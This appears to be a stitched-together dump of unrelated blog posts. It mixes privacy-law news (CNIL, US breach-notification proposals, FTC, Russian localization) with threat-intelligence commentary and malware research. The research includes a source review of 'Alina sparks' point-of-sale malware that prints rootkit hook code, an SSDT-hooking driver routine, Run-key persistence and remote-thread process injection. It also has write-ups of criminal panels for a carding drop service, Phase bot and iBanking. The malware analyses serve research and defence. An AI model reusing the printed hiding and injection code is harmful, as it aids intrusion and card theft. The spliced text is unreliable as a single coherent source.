I'm unsure whether the author was going for irony or sarcasm, or has simply never seen a good Threat Intelligence feed before -- but this is just categorically wrong. Publishing this kind of thing is irresponsible, and does a disservice to the reading public who take these words for truth from a journalist.


Hyperbole and Irony

Let's be honest, there are plenty of threat intelligence feeds that match that definition. I can think of a few I'd love to tell you about but non-disclosure agreements make that impractical. Then there are those that provide a tremendous amount of value when they are properly utilized at the proper point in time, by the proper resources.

Take for example a JSON-based feed of validated, known-bad IP addresses from one of the many providers of this type of data. I would hardly call this intelligence, but rather reputational data in the form of a feed. Sure, it's consumed much like you would consume an RSS feed of news -- except that the intent is typically automated consumption by tools and technologies, with very little human intervention.

Is the insinuation here that this type of thing has little value? I would agree that in the grand scheme of intelligence, a list of known-bad IP addresses has a very short shelf-life and a complicated utility model, one which is necessarily more than a binary decision of "good vs. bad" -- but this does not completely destroy its utility to the security organization. Take for example a low-maturity organization that is understaffed and relies heavily on network-based security devices to protect its assets. Incorporating a known-bad (IP reputation) feed into its currently deployed network security technologies may be more than a simple added layer of security. It may in fact be an evolution, but one that only a lower-level security organization can appreciate.
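
To make "automated consumption" concrete, here's a minimal sketch of what plugging such a feed into existing tooling might look like; the URL and JSON field names here are made up for illustration:

import json
import urllib.request

FEED_URL = "https://feeds.example.com/known-bad-ips.json"  # hypothetical feed

# Pull the reputation list and emit one firewall rule per address;
# in practice this runs on a schedule, since reputation data goes stale fast
with urllib.request.urlopen(FEED_URL) as resp:
    entries = json.load(resp)

for entry in entries:
    print("iptables -A INPUT -s %s -j DROP" % entry["ip"])  # assumed field name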

My point is, don't throw away the potential utility of something like a reputation feed without first considering the context within which it will be useful.


Without Intelligence, We're Blind

I don't know how to make this more clear. After spending a good portion of the last 4 months studying successful and operational security programs I can't imagine a scenario where a security program without the incorporation of threat intelligence is even viable. I'm sorry to report that without a threat-intelligence focused strategy, we're left deploying the same old predictable patterns of network security, antivirus/endpoint and other static defenses which our enemies are well attuned to and can avoid without putting much thought into it.

While I agree that the marketing organizations in the big vendors (and the small, to be fair) have all but ruined the reputation of the phrase threat intelligence, I dare you to run a successful security program without understanding your threats and adversaries, and to be successful at efficient detection and response. Won't happen.

I guess I'm biased since I've spent so much time researching this topic that I'm now what you may consider a true believer. I can sleep well knowing that thorough (and ongoing) research into successful security programs which incorporate threat intelligence leads me to conclude that threat intelligence is essential to an effective and focused enterprise security program. I'm still not an expert, but at least I've seen it both succeed and fail and can tell the difference.


So why the hate? Let's ideate

I get it, security people are experiencing fatigue from buzzwords and terms taken over by marketing people, which makes our ears bleed every time someone starts making less than no sense. I get it, I really do. But let's not throw the baby out with the bathwater. Let's not dismiss something that has the potential to transform our security programs into something relevant to today's threats just because we're sick of hearing talking heads misuse and abuse the term.

I also get that when terms are over-hyped and misused, it does everyone an injustice. Is an IP reputation list threat intelligence? I wouldn't call it that... it's just data. But there are hallmarks of threat intelligence that make it useful and much more than just a buzzword:

  1. it's actionable
  2. it's complete
  3. it's meaningful

Once you have these characteristics in your threat intelligence "feed," you have significantly more than an RSS feed. You have something that can act as a catalyst for a security program stuck in the '90s. Let's not let our urge to be snarky get the best of us and throw away a perfectly legitimate term. Instead, let's point out those who misuse and abuse the term, and call them out for their disservice to our mission.

French Data Protection Authority Issues New Referential Regarding Seals on Data Privacy Governance Procedures

On January 13, 2015, the French Data Protection Authority (the “CNIL”) published a Referential (the “Referential”) that specifies the requirements for organizations with a data protection officer (“DPO”) in France to obtain a seal for their data privacy governance procedures.

According to the CNIL, “governance of personal data” (also called “governance of IT and Civil Liberties”) includes all the measures, rules and best practices that allow private and public organizations to manage personal data in compliance with data protection principles. The goal of the Referential is to assist organizations that have appointed a DPO in France to (1) implement these measures, rules and best practices; and (2) improve accountability.

The Referential includes 25 requirements that apply cumulatively and are divided into three categories.

1. Internal Organization Related to Data Protection

This category relates to the organization’s data privacy policies and DPO, and includes requirements:

  • To have an internal privacy policy that defines the role and responsibility of each actor involved in the implementation of data processing operations. The internal privacy policy explains how the organization protects personal data and contains the organization’s primary data protection principles.
  • To have an outward-facing privacy policy in French. This policy informs the relevant external individuals (such as customers and vendors) about the processing of their personal data.
  • That the DPO be appointed for all data processing operations within the organization.
  • That the DPO report directly to a member of the executive board, have attended all of the CNIL’s training sessions on basic data protection principles, data security and HR issues, and have appropriate means (including an annual budget) to fulfil his or her duties.
  • That the DPO create a comprehensive register of all processing operations implemented by the organization that contains significantly more information than the information currently provided by the DPO in its register (e.g., how any consent was obtained, the use of cookies, etc.).

2. Method of Verifying that Data Processing Operations Comply with Data Protection Law

This category includes the requirements to (1) conduct data security risk assessments, (2) implement appropriate data security measures to address the risks identified, and (3) conduct periodic audits (internal or external) to ensure that the processing operations that pose the highest risk are compliant with law.

3. Assessment of the Management of Data Subjects’ Complaints and Data Incidents

This category includes the requirements to have specific procedures to handle data subjects’ requests and manage data security breaches. The procedure for data security breaches must cover (1) the detection of breaches; (2) the conveying of information concerning the breach to the DPO within 24 hours of detection; (3) a determination of the nature of the breach; (4) the DPO’s formulation of recommendations and their transmission to the data controller; (5) the data controller’s action plan; and (6) the implementation of corrective actions and the DPO’s advice about the implementation, as well as a revision of the previous risk analysis, if appropriate. In addition, the individuals affected by the data security breach must be notified of unauthorized access to their data by a third party within 72 hours.

According to the CNIL, compliance with the requirements in the Referential will allow companies to prepare for the accountability obligations that will be introduced by the proposed EU General Data Protection Regulation. In this respect, the Referential confirms that the DPO is the strategic cornerstone of accountability and data privacy compliance.

Alina ‘sparks’ source code review

I recently got my hands on the source code of Alina "sparks". The main 'improvement' that everyone is talking about, and that makes the price of this malware rise, is the rootkit feature.
Josh Grunzweig already did an interesting coverage of a sample, but what is this new version worth?

InjectedDLL.c from the source is a Chinese copy-paste of http://www.cnblogs.com/lzjsky/archive/2010/12/01/1892702.html, commented out and replaced with two kernel32 hooks instead, as if the author cannot into hooks :D
A comment is still in Chinese, as you can see on the screenshot.

+ this:
LONG WINAPI RegEnumValueAHook(HKEY hKey, DWORD dwIndex, LPTSTR lpValueName, LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
{
    LONG Result = RegEnumValueANext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);
    if (StrCaseCompare(HIDDEN_REGISTRY_ENTRY, lpValueName) == 0)
    {
        Result = RegEnumValueWNext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);
    }
    return Result;
}

...

// Registry Value Hiding
Win32HookAPI("advapi32.dll", "RegEnumValueA", (void *) RegEnumValueAHook, (void *) &RegEnumValueANext);
Win32HookAPI("advapi32.dll", "RegEnumValueW", (void *) RegEnumValueWHook, (void *) &RegEnumValueWNext);
So many stupid mistakes in the code: no sanity checks in the hooks, nothing stable.
I haven't looked at a sample in the wild, but I doubt it works at all.
The actual rootkit source (the driver body is stored as a hex array in RootkitDriver.inc; c:\drivers\test\objchk_win7_x86\i386\ssdthook.pdb) is not included in this pack of crap.

This x86-32 driver is responsible for SSDT hooking of NtQuerySystemInformation, NtEnumerateValueKey and NtQueryDirectoryFile.
The driver is ridiculously simple:
NTSTATUS NTAPI DrvMain(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
  DriverObject->DriverUnload = (PDRIVER_UNLOAD)UnloadProc;
  BuildMdlForSSDT();
  InitStrings();
  SetHooks();
  return STATUS_SUCCESS;
}

BOOL SetHooks()
{
  if ( !NtQuerySystemInformationOrig )
    NtQuerySystemInformationOrig = HookProc(ZwQuerySystemInformation, NtQuerySystemInformationHook);
  if ( !NtEnumerateValueKeyOrig )
    NtEnumerateValueKeyOrig = HookProc(ZwEnumerateValueKey, NtEnumerateValueKeyHook);
  if ( !NtQueryDirectoryFileOrig )
    NtQueryDirectoryFileOrig = HookProc(ZwQueryDirectoryFile, NtQueryDirectoryFileHook);
  return TRUE;
}

All of them hide the 'windefender' target process, file and registry entries.
void InitStrings()
{
  RtlInitUnicodeString((PUNICODE_STRING)&WindefenderProcessString, L"windefender.exe");
  RtlInitUnicodeString(&WindefenderFileString, L"windefender.exe");
  RtlInitUnicodeString(&WindefenderRegistryString, L"windefender");
}
It's the malware's name; Josh also pointed in this direction in his analysis.
First submitted to VT on 2013-10-17 17:27:10 UTC (1 year, 2 months ago):
https://www.virustotal.com/en/file/905170f460583ae9082f772e64d7856b8f609078af9823e9921331852fd07573/analysis/1421046545/

Overall that DLL seems unused; the Alina project uses the driver I mentioned.
As for the project itself, it's still an awful piece of student lab work. Here is a log just from an attempt to compile:
source\grab\base.cpp(78)
If SHGetSpecialFolderPath returns FALSE, strcat to SourceFilePath will be used anyway.

Two copy-pasted methods with the same mistake:
source\grab\base.cpp(298)
source\grab\base.cpp(433)
Leaking process information handle pi.hProcess.

Using hKey from a failed function call:
source\grab\base.cpp(316):
if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0L,  KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS) {
      RegCloseKey(hKey);

pThread could be NULL; this is checked only in WriteProcessMemory, not in CreateRemoteThread:
source\grab\monitoringthread.cpp(110):
LPVOID pThread = VirtualAllocEx(hProcess, NULL, ShellcodeLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pThread != NULL) WriteProcessMemory(hProcess, pThread, Shellcode, ShellcodeLen, &BytesWritten);
HANDLE ThreadHandle =  CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) pThread, NULL, 0, &TID);

hwid is declared as char hwid[8], so reading from hdr->hwid reads invalid data: the readable size is 8 bytes, but 18 bytes may be read:
source\grab\panelrequest.cpp(73):
memcpy(outkey, hdr->hwid, 18);

realloc might return a null pointer: assigning that null pointer to buf, which is passed as an argument to realloc, will cause the original memory block to be leaked:
source\grab\panelrequest.cpp(173)

The prior call to strncpy might not zero-terminate the string Result:
source\grab\scanner.cpp(159)

The return value of ReadFile is ignored. If it fails anywhere, the code will be corrupted, as the cmd variable is not initialized:
source\grab\watcher.cpp(61)
source\grab\watcher.cpp(64)
source\grab\watcher.cpp(71)

Signed/unsigned mismatch:
source\grab\rootkitinstaller.cpp(47)

Unreferenced local variable hResult:
source\grab\base.cpp(158)

Using TerminateThread does not allow proper thread cleanup:
source\grab\watcher.cpp(125)

Now, about the 'editions': sparks has some, for example the pipes, mutexes, user-agents and the process blacklist, but most of these edits are minor things that anybody can do to 'customise' their own bot.
In any case, they hardly count as code additions or anything 'new'.
As for the panel... well, it's like the bot: nothing changed at all.
It's still the same ugly design, still the same files with the same modification timestamps, no code additions, still the same cookie-auth crap, as if the coder can't use sessions in PHP, and so on...

To conclude, the main improvement is a copy/pasted rootkit that doesn't work. I don't know how many bad guys bought this source for 1k or more, but it's definitely not worth it.
Overall it's a good example of how people can take some code, announce a rootkit to impress, and trade on malware notoriety.
This reminds me of the guys who announced IceIX on malware forums, when the samples finally turned out to be just a basic ZeuS with broken improvements.

President Obama Announces a National Data Breach Notification Standard and Other Cybersecurity Legislative Proposals and Efforts

On January 13, 2015, President Obama announced legislative proposals and administration efforts with respect to cybersecurity, including a specific proposal for a national data breach notification standard. Aside from the national data breach notification standard, the President’s other proposals are designed to (1) encourage the private sector to increase the sharing of information related to cyber threats with the federal government and (2) modernize law enforcement to effectively prosecute illegal conduct related to cybersecurity.

The proposed national data breach notification standard is largely preemptive of state data breach notification laws and would require businesses to notify affected individuals if their sensitive personally identifiable information (“SPII”) is subject to a “security breach.” Key aspects of the proposal are uniformly onerous from a business perspective. For example:

  • The definition of SPII is broadly construed and differs from corresponding definitions of personal information under state data breach notification statutes.
  • Businesses would have thirty days to notify affected individuals of a security breach, with limited exceptions. Businesses would not need to notify affected individuals if “there is no reasonable risk of harm or fraud” to the affected individuals. This high threshold, combined with the need to conduct a risk assessment and report the results to the FTC in order to rely on it, creates a more onerous standard than the majority of state laws with respect to consumer harm.
  • Businesses are required to notify individuals directly and provide media notification in any state with more than 5,000 affected individuals.
  • Businesses must notify “an entity designated by the Department of Homeland Security” within 10 days of discovering the breach.

In addition to breach notification, President Obama’s proposal encourages the private sector to share “appropriate cyber threat information with the Department of Homeland Security’s National Cybersecurity and Communications Integration Center” (“NCCIC”). According to the announcement, the NCCIC will then share the cyber threat information with (1) appropriate federal agencies and (2) Information Sharing and Analysis Organizations (“ISAOs”), which are developed and operated by the private sector. To encourage sharing with ISAOs, the Obama Administration’s proposal grants “targeted liability protection” to companies that share the cyber threat information they acquire.

A third proposal seeks to modernize law enforcement to effectively combat illegal activities relating to cybersecurity. For example, according to the announcement, the proposal “would allow for the prosecution of the sale of botnets, would criminalize the overseas sale of stolen U.S. financial information like credit card and bank account numbers, would expand federal law enforcement authority to deter the sale of spyware used to stalk or commit ID theft, and would give the courts the authority to shut down botnets engaged in distributed denial of service attacks and other criminal activity.”

Tiberium/Consuella USPS money laundering service


Consuella was a 'USPS drop service' run by one of the Lampeduza administrators.
This type of service helps credit card thieves "cash out" by shipping packages with carded USPS labels overseas (or not).
They were also constantly recruiting mules in the United States to keep addresses in rotation.


Here is what the service looks like from an admin's point of view:


Add a payment:

Users:
Supports:

News:

Settings:

Consuella was incredibly simple compared to other drop-shipping services such as addtrack.biz and pac-man.co, which had fake websites for mules built into the panel.

FTC Chair Calls for Security by Design, Data Minimization and Notice and Choice for Unexpected Uses in Remarks on the Internet of Things at the 2015 International Consumer Electronics Show

On January 6, 2015, Federal Trade Commission Chairwoman Edith Ramirez gave the opening remarks on “Privacy and the IoT: Navigating Policy Issues” at the 2015 International Consumer Electronics Show (“International CES”) in Las Vegas, Nevada. She addressed the key challenges the Internet of Things (“IoT”) poses to consumer privacy and how companies can find appropriate solutions that build consumer trust.

Chairwoman Ramirez acknowledged that the IoT “has the potential to provide enormous benefits for consumers, but it also has significant privacy and security implications.” She offered “three key challenges…the IoT poses to consumer privacy: (1) ubiquitous data collection; (2) the potential for unexpected uses of consumer data that could have adverse consequences; and (3) heightened security risks.”

The first challenge from the IoT, ubiquitous data collection, arises from the “digital trail” consumers leave behind as more technology is introduced into intimate spaces and sensitive data is collected. Companies monitor and analyze this data and can “make additional sensitive inferences and compile even more detailed profiles of consumer behavior.” The second challenge of “unexpected uses,” raises the question of whether these uses are “inconsistent with consumers’ expectations or relationship with a company.” According to Chairwoman Ramirez, the risks may include that the collected information may “paint a picture” of the consumer that the consumer “will not see but that others will,” including others that might make decisions about the consumer. Finally, Ramirez highlighted the heightened security risk associated with IoT devices, as the small size, limited processing power, and often low-cost and disposable nature of such devices may inhibit appropriate protections.

In the second half of her speech, Chairwoman Ramirez addressed three things companies can do to address these challenges. The first is to prioritize security and incorporate security into the device design process. Second, companies should “follow the principle of data minimization,” and only collect data needed for a specific purpose and destroy the data after it has served its purpose. She acknowledged that limits on data collection can hinder a company’s access to potentially valuable information, but she questioned whether “we must put sensitive consumer data at risk” to reap unknown benefits in the future. According to Ramirez, “reasonable limits on data collection and retention are a necessary first line of protection for consumers.” Finally, while recognizing the risk of burdening consumers with too much information and too many choices, she noted that companies should nevertheless find ways to provide consumers “clear and simple notice” of how their data is being collected and used.

Chairwoman Ramirez concluded by emphasizing the importance of a balanced approach to the IoT that allows it to continue to evolve and flourish while also protecting consumer privacy.

The International CES is a major global consumer electronics and consumer technology tradeshow hosted by the Consumer Electronics Association, a technology trade association representing the U.S. consumer electronics industry.

Safeway Reaches Settlement with California District Attorneys Over Allegations of Unlawful Disposal of Medical Records

On January 5, 2015, the Alameda County District Attorney’s Office announced that Safeway Inc. (“Safeway”) has agreed to pay $9.87 million to settle claims that the company unlawfully disposed of customer medical information and hazardous waste in violation of California’s Confidentiality of Medical Information Act and Hazardous Waste Control Law. In a series of waste inspections from 2012 to 2013, a group of California district attorneys and environmental regulators found that Safeway was disposing of both its pharmacy customers’ confidential information and various types of hazardous wastes in the company’s dumpsters. Based on the investigation, 42 California district attorneys and two city attorneys brought a complaint on December 31, 2014, alleging, among other things, that more than 500 Safeway stores and distribution centers engaged in the disposal of their customers’ medical information in a manner that did not preserve the confidentiality of the information.

The settlement calls for Safeway to pay (1) a $6.72 million civil penalty, (2) $2 million for supplemental environmental projects and (3) $1.15 million in attorneys’ fees and costs. In addition, pursuant to the agreement, Safeway must maintain and enhance, as necessary, its customer record disposal program to ensure that customer medical information is disposed of in a manner that preserves the customer’s privacy.

Phase (Win32/PhaseBot-A)

A small write-up about 'Phase', a piece of malware that appeared and vanished very rapidly.
I had a look at it with MalwareTech, who wrote several stories on it. It was shown that Phase is in reality a 'new' version of Solar bot. At least, not so new: the code is so copy/pasted that even antivirus products such as Avast trigger false positives and now detect Napolar (Solar) as PhaseBot.

Advert:

Phase support website:

The coder is using a public snippet for chatting with customers:
So weak that it's even vulnerable to XSS.

Master balance? Less than 1k.
Phase seems not so popular, and it also got rapidly lynched by other actors on forums.

Anyway, let's have a look at the web panel.
Login:

Dashboard:

Commands:

Botlist:

Credentials:

Socks5:

Browsers:

Modules:

Analyzer detector:

RDP:

Settings:

FAQ:

Structure:

An in-the-wild panel, with the RAM scraper plugin + VNC:

RAM scraper plugin:

Remote-controlled point of sale:

Another botnet with a hacked, remote-controlled point of sale:

Wallet stealer:

Phase samples:
ae7a56b3adf6f7684ba14a77c017904d
12dccdec47928e5298055996415a94f2
d1446326bf1c69ea9df6e65bd472f358
1f3e808a3ccd981f3e61de227dae93b8
6ce0bb4cd86295f915160d7207a07a47
5767b9bf9cb6f2b5259f29dd8b873e36
a10f84153dba7b73980f0ff50d8cc8e6
f8ffcab3324561598ce5c375c07066be
e4574fbc1014d27e1b6906bfc5351e0e
d2ed20b1996e7e5bad2b91fd255732ef
f89b4e626c7a81544ca7395be3262cf6
ef69575e14fa965380242db26675d2df
fc586c3ec37e51668e905d0acfc913f6
eb9b56d829c3951b6e9cb5e4a651f7c8
6f53d3cd1acb7541bcc7399c4af001b1
19fa3927577571c51428f6eee2b5f52f
4ec84f1aa91e4cdc12118002244ca582
20e3a9ec396ad8b57a36ea3c6b9f151a
fe5dfa53204a65eca741ceab352c3b00
ace0a059dc2264c847d4e6c91f829dfd
f01c1ea73e968c2309391dcf3f0a2848

Unencrypted RAM scraper plugin: 1e18ee52d6f0322d065b07ec7bfcbbe8
Unencrypted VNC plugin: 94eefdce643a084f95dd4c91289c3cf0
Panel: c43933e7c8b9d4c95703f798b515b384 (with a small TrendMicro signature fail, "PHP_SORAYA.A"; no, this is not the Soraya panel)
Needless to say, the panel was also vulnerable.

iBanking

iBanking is an Android malware made to intercept voice and text information.
The panel is poorly coded.

Login:

Projects:

Phone list:

SMS List:

All SMS (Incoming):

All SMS (Outgoing):

Call list (Incoming):

Call list (Outgoing):

Call list (Missed):

Sounds:

Contact list:

Url report:

President Obama Announces Initiatives on Data Security and Student Privacy

On January 12, 2015, President Obama announced at the Federal Trade Commission several new initiatives on data security and consumer privacy as part of a weeklong focus on privacy and cybersecurity. He noted that on January 13 at the Department of Homeland Security, he would address how to improve protections against cyber attacks, and on January 14, he would address how more Americans can have access to faster and cheaper broadband Internet. He stated that the announcements he is making this week are “sneak previews” of the proposals he will make in next week’s State of the Union address.

Acknowledging the tremendous benefits and opportunities associated with the digital economy, President Obama noted that “we shouldn’t have to forfeit our basic privacy when we go online to conduct business.” Specifically, the President proposed the following four measures to protect consumers’ data security and privacy:

  • Data breach notification legislation. The President will introduce legislation for a single, strong national breach notification standard that will require companies to notify their customers within 30 days of a data breach. This legislation also will close “loopholes” to enable action against criminals who are overseas.
  • Improved access to credit scores. There will be enhanced and free access to a credit score early warning system that will notify consumers of fraudulent activities on their financial accounts.
  • Comprehensive privacy legislation. By the end of February, the President will introduce the Consumer Privacy Bill of Rights, a comprehensive privacy law that includes basic principles on what data may be collected and how it may be used. President Obama noted that consumers have the right to know that when information is collected for one purpose, it will not subsequently be used for a different purpose.
  • Student privacy legislation. The President will introduce the Student Digital Privacy Act, which will ensure that data collected “in the classroom” will be used only for educational purposes and not for commercial purposes, such as targeted advertising or student profiling. The proposed law will permit research to improve educational outcomes and tools.

Noting that privacy and data security should not be partisan issues, President Obama expressed optimism about the success of these initiatives. According to the President, “business leaders want their privacy and their children’s privacy protected just like everybody else does. Consumer and privacy advocates also want to make sure that America keeps leading the world in technology and innovation and apps.”

Irish Government Files Amicus Brief in Microsoft Case

In December 2014, we reported that various technology companies, academics and trade associations filed amicus briefs in support of Microsoft’s attempts to resist a U.S. government search warrant seeking to compel it to disclose the contents of customer emails that are stored on servers in Ireland. On December 23, 2014, the Irish government also filed an amicus brief in the 2nd Circuit Court of Appeals.

The amicus brief filed by the Irish government notes the servers are located in Ireland and stresses the importance of Irish sovereignty. The Irish government argues that the appropriate mechanism for obtaining data held on servers in Ireland is through international cooperation and the use of existing international treaties that were entered into for the specific purpose of enabling a government to request information that is subject to the laws of a foreign country.

The Irish government also noted a previous case where the Supreme Court of Ireland held that an Irish court can compel the disclosure of information stored by an Irish entity outside of Ireland if the information is for a criminal or similar investigation and there are no alternative means of obtaining the information. It is unclear, however, to what extent the U.S. court will consider a decision issued by a foreign court, such as the Supreme Court of Ireland.

Echoing its previous appeal to the U.S. government to “find a better way forward,” Microsoft welcomed the Irish government’s brief and reiterated its view that an international dialogue is the best way to resolve the issue of cross-border disclosure requests.

French Data Protection Authority Issues New Decision on Monitoring and Recording Telephone Calls in the Workplace

In a decision published on January 6, 2015, the French data protection authority (the “CNIL”) adopted a new Simplified Norm NS 47 (the “Simplified Norm”) that addresses the processing of personal data in connection with monitoring and recording employee telephone calls in the workplace. Data processing operations in compliance with all of the requirements set forth in the Simplified Norm may be registered with the CNIL through a simplified registration procedure. If the processing does not comply with the Simplified Norm, however, a standard registration form must be filed with the CNIL. The Simplified Norm includes the following requirements:

Scope of the Simplified Norm

Only data processing operations that involve monitoring and recording employee telephone calls on a periodic basis are within the scope of the Simplified Norm. If employee telephone calls are recorded on a permanent or systematic basis, the data processing may not benefit from the simplified registration procedure. Further, the monitoring and recording of telephone calls may not be implemented by any public or private organization whose tasks consist of collecting sensitive personal data. Audiovisual recordings also are excluded from the scope of the Simplified Norm.

Purposes of the Data Processing

In order to benefit from the Simplified Norm, organizations may only listen to and record employee telephone calls for one or more of the following purposes: employee training, employee performance and improvement in the quality of the service.

The other requirements of the Simplified Norm relate to the types of personal data collected and processed, the recipients of the data, the data retention periods, the information to be provided to employees and call participants, the security measures to be implemented, and the rules to be observed in case of data transfers outside of the European Union. This Simplified Norm will help reduce the formalities linked to the registration process with the CNIL and serve as useful guidance for companies wishing to monitor or record their employees’ telephone calls.

Video archives of security conferences and workshops


Just some links for your enjoyment

List of security conferences in 2014

Video archives:




AIDE (Appalachian Institute of Digital Evidence)


Blackhat
Botconf
Bsides
Chaos Communication Congress
Defcon
Derbycon
Digital Bond's S4x14
Circle City Con
GrrCON Information Security Summit & Hacker Conference
Hack in the box HITB
InfowarCon
Ruxcon
Shmoocon
ShowMeCon
SkyDogCon
TakeDownCon
Troopers (Heidelberg, Germany)
Workshops, How-tos, and Demos

Special thanks to Adrian Crenshaw for his collection of videos

Deadline for Compliance with Russian Localization Law Set for September 1, 2015

On December 31, 2014, Russian President Vladimir Putin signed legislation to move the deadline for compliance to September 1, 2015, for Federal Law No. 242-FZ (the “Localization Law”), which requires companies to store the personal data of Russian citizens in databases located in Russia. The bill that became the Localization Law was adopted by the lower chamber of Russian Parliament in July 2014 with a compliance deadline of September 1, 2016. The compliance deadline was then moved to January 1, 2015, before being changed to September 1, 2015 in the legislation signed by President Putin.

The Russian law firm ALRUD reports that the Localization Law creates a new obligation to store personal data of Russian citizens in Russia, meaning that companies located outside Russia “will be forced to place their servers within Russia if they plan to continue making business in the market.” The exact purview of the Localization Law is somewhat ambiguous, but the law requires data operators to ensure that the recording, systemization, accumulation, storage, revision (updating and amending), and extraction of personal data of Russian citizens occur in databases located in Russia. As an example of the ambiguity regarding the scope of the Localization Law, it is unclear whether the law applies to companies that collect personal data from Russian customers but have no physical presence in Russia. In addition, it is unclear whether the law will affect the cross-border transfers of personal data from Russia to foreign jurisdictions.

Hong Kong Privacy Commissioner Publishes Guidance on Cross-Border Data Transfers

On December 29, 2014, the Hong Kong Office of the Privacy Commissioner for Personal Data published guidance (the “Guidance Note”) on the protection of personal data in cross-border data transfers. The Guidance Note was released in light of the Privacy Commissioner’s intention to elaborate on the legal restrictions governing cross-border data transfers in Hong Kong, though these have not yet gone into effect.

Although the Hong Kong Personal Data (Privacy) Ordinance (the “Ordinance”) contains a provision (“Section 33”) imposing restrictions on cross-border data transfers, this provision did not go into effect when the rest of the Ordinance was enacted in 1995. Consequently, there currently is no effective legal restriction on cross-border data transfers in Hong Kong. As such, the new Guidance Note published by the Privacy Commissioner is voluntary and not binding. The Privacy Commissioner intends for the Guidance Note to be a practical guide that helps data users prepare for the cross-border data transfer restrictions of Section 33. The Privacy Commissioner noted, however, that no firm date has been set for Section 33 to go into operation.

Notably, the Guidance Note provides recommended model contractual clauses for cross-border data transfers of personal data outside of Hong Kong. The Privacy Commissioner’s Office does not require that the recommended model clauses be used verbatim. Instead, the Guidance Note advises the parties to make revisions or additions according to their own commercial needs.